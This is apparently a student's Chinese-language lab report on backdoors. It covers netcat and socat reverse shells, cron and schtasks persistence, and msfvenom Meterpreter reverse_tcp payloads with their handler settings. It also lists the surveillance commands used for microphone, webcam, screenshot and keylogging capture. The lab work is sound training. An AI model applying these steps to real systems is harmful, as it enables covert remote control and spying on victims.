1.实验内容
(1)使用netcat获取主机操作Shell,cron启动某项任务
(2)使用socat获取主机操作Shell, 任务计划启动
(3)使用MSF meterpreter(或其他软件)生成可执行文件(后门),利用ncat或socat传送到主机并运行获取主机Shell
(4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容的后门,并尝试提权
(5)使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。
2.实验过程
2.0关闭windows防火墙、实时保护
2.1使用netcat获取主机操作Shell,cron启动某项任务
2.1.1windows主机使用netcat并获取shell
查看windows主机ip(我是在两个教室做的,所以有两个IP地址):
第一次:
第二次:
windows主机监听8888端口:
kali虚机连接主机8888端口并执行shell:
在主机输入命令:
可以看到主机已成功获取虚拟机shell。
2.1.2通过设置cron使得kali启动定时任务
因为Windows不能直接使用crontab -e远程编辑,会报错;
所以我们进入虚拟机的虚拟机的root账户,输入crontab -e (执行文字编辑器来设定时程表),选择的是2
输入后进入文字编辑器,输入指令并退出
同时在Linux主机中的/var/spool/cron/crontabs文件中会出现一个root文件。
在主机中输入命令,写入定时任务指令,并查看时程表:
进入Linux虚拟机进入对应路径检查文件,发现修改成功。
定时任务执行成功!
2.2使用socat获取主机操作Shell, 任务计划启动
2.2.1
主机使用socat监听8888端口:
虚机连接主机8888端口:
可以看到虚机已经获取到windows主机shell。
PS:这里出现了乱码,我看到了刘品源同学的实验报告,成功解决了乱码。
2.2.2通过命令行创建任务计划,执行定时任务
编写c程序并编译为shiyan2.exe:
使用schtasks命令添加任务计划,每分钟执行一次编写的程序:
回到windows主机,打开任务计划程序库,看到正在运行的任务:
定时任务执行成功!
2.3使用MSF meterpreter生成可执行文件(后门),利用ncat传送到主机并运行获取主机Shell
查看虚机ip:
使用msfvenom 工具生成一个反向 TCP Meterpreter shell 的 payload,并将其保存到一个可执行文件中:
LHOST=192.168.117.129是shell连接的主机 IP 地址,是虚拟机的IP地址;
LPORT=8888是监听的端口号;
-f exe指定了生成的 payload 的格式,这里是exe。
主机监听8888窗口等待接收可执行文件并将其存放在指定目录下:
虚机将生成的后门文件传给主机:
可以看到文件成功传输。
在Kali终端输入命令msfconsole,然后对监听模块进行配置:
use exploit/multi/handler(使用监听模块,设置payload)
set payload windows/meterpreter/reverse_tcp (使用和生成后门程序时相同的payload)
set LHOST 192.168.117.129 (攻击机的IP地址,和生成后门程序时指定的IP相同)
set LPORT 8888(监听的端口)
输入exploit,使监听模块开始运行,并在Windows终端运行后门2221backdoor.exe文件:
接着输入exploit,使监听模块开始运行,并在Windows终端运行后门2324backdoor.exe文件
返回检查虚拟机,输入ls查看windows主机目录。
确认已经连接。
2.4使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容的后门,并尝试提权
在exploit模块中继续输入以下命令:
record_mic (音频)
screenshot (截屏)
webcam_snap (拍照)
keyscan_start (开始读取键盘记录)
keyscan_dump (读取键盘记录结束)
2.4.1获取目标主机音频、截屏、摄像头、键盘记录
在exploit模块中继续输入以下命令
2.4.2提权
2.5使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell
使用msfvenom 工具生成一个 Meterpreter 反向 TCP shell的 payload,并将其注入到指定的可执行文件中,然后将结果输出到一个20222324_pwn的文件中:
-p linux/x86/meterpreter/reverse_tcp:指定要生成的 payload 类型。
LHOST=192.168.117.129:目标主机 IP ,这里即虚拟机IP地址。
LPORT=8888:设置 Meterpreter shell 使用的本地端口号为 8888。
-x /home/kali/Document/pwn1:指定一个可执行文件作为模板,生成的 payload 将会注入到该文件中。
-f elf:指定输出文件的格式为 ELF 格式,适用于 Linux 系统的可执行文件格式。
输入指令msfconsole,配置监听过程并打开另一个shell,添加20222324_pwn的权限并运行
此时获取反弹连接Shell:
3.问题及解决方案
1.在运行后门时,系统提示程序被占用,无法执行。后面询问了同学,重启kali,再次运行backboor就可以了。
2.在任务二中,虚机连接主机8888端口,我出现了乱码现象,后面看了刘品源的实验报告,成功解决。
4.学习感悟、思考等
4.1问题回答
(1)例举你能想到的一个后门进入到你系统中的可能方式?
在盗版、第三方网站下载资源
(2)例举你知道的后门如何启动起来(win及linux)的方式?
Windows:注册表启动:攻击者可以修改注册表的启动项,以使后门在系统启动时自动运行
Linux:修改 Cron 任务:通过 cron 配置定时任务,使后门定期执行
(3)Meterpreter有哪些给你映像深刻的功能?
摄像头访问:当时拍照给我吓了一跳。
键盘记录:可以捕获用户的键盘输入,可以获得密码。
(4)如何发现自己有系统有没有被安装后门?
使用安全工具扫描:使用杀毒软件或专业安全工具进行系统扫描,查找潜在的后门程序
检查启动项和服务
4.2实验感悟
在这次实验中,我可以使用netcat和socat获取主机操作Shell,并添加cron定时任务、使用schtasks命令添加任务计划,来远程执行程序。同时我也认识隐私泄露与权限窃取的风险之大,所以我们要增强我们的网络安全意识。
